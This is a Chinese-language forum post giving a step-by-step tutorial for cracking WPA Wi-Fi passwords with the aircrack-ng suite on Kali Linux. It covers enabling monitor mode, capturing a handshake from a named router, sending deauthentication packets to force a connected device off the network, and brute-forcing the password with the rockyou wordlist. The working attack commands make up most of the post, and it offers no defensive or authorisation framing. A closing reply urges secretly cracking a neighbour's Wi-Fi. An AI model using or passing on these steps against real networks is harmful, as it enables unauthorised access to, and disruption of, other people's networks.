[xmd]首先
无线网卡连接
先要连接USB网卡,点击虚拟机—设置—USB控制器,设置如下,
查看右下角边框的usb显示,是否连接,未如连接,则点击右键,链接,连接成功显示
还有,保证这个已连接,设置完成。
无线网卡配置
连接好之后,通过iwconfig查看无线网卡工作是否正常,下面说明是正常的。
设置监听模式
使用aircrack-ng工具的airmon-ng来启动监听模式,在使用前先清理阻碍的进程,命令
airmon-ng check kill
airmon-ng start wlan0
当wlan0后面有个mon时,说明monitor监听模式成功启动。
抓取握手包
使用airodump-ng wlan0mon来扫描网络,如图.之后会开始扫描
命令参数:
bssid是ap(access point)的mac地址,在这里ap为路由器
pwr代表信号水平,信号只越高说明距离越近,但是注意,
-1值说明无法监听
ch表示工作的信道号
enc表示算法加密体系
cipher表示检测到的加密算法
auth表示认证协议
essid即ssid号,wifi的名称
station表示客户端的mac地址(ctrl-c停止扫描)
5、抓取握手包,从上一步扫描到的结果中选定目标,留意bssid和ch,使用命令
airodump-ng -c 6 -w king --bssid F8:9A:78:29:A8:68 wlan0mon
参数:-c 选取频道号 -w 1保存ivs格式的包,名字为1 --bssid 要破解ap的ssid
注意
我们只有一般的数据包,是无法进行密码破解的,我们需要的是用户连接WiFi时的握手包。
在上面的图中,出现这个信息,说明成功抓到了握手包
但是,我们不一定每次都能正好抓到这个包,所以,我们需要使用一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;
原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。打开新终端执行:
aireplay-ng -0 10 -a F8:9A:78:29:A8:68 -c C0:B4:7D:72:CD:89 wlan0mon
参数:-0指定发送反认证包的个数 -a指定无线路由器BSSID -c指定强制断开的设备。
直到出现上面的信息(红色框框),说明成功抓到握手包,Ctrl+c结束。
抓到握手包后,就可以结束监控模式了
用字典爆破密码
开始破解密码,执行如下的命令,就可以看到已经破解出密码,如果密码复杂一点,可能需要的时间。aircrack-ng -w 字典 保存的包
kali自带有一份无线wifi密码字典,但是需要先解压
1 gzip -d /usr/share/wordlists/rockyou.txt.gz
wifi.txt是爆破字典,test-01.cap是抓的包的文件
aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap
aircrack-ng -w <指定字典> <抓到的握手包>
成功得到密码。
aircrack-ng -w pass.txt 1-01.cap
因为我的字典文件就放在这个目录下所以就不用自带的了,一般弱口令很容易破解的。
|
字典可以给,顺便字典生成器,有时间了会上传的
使用道具 举报
偷偷干,就破解邻居家的就够用了
使用道具 举报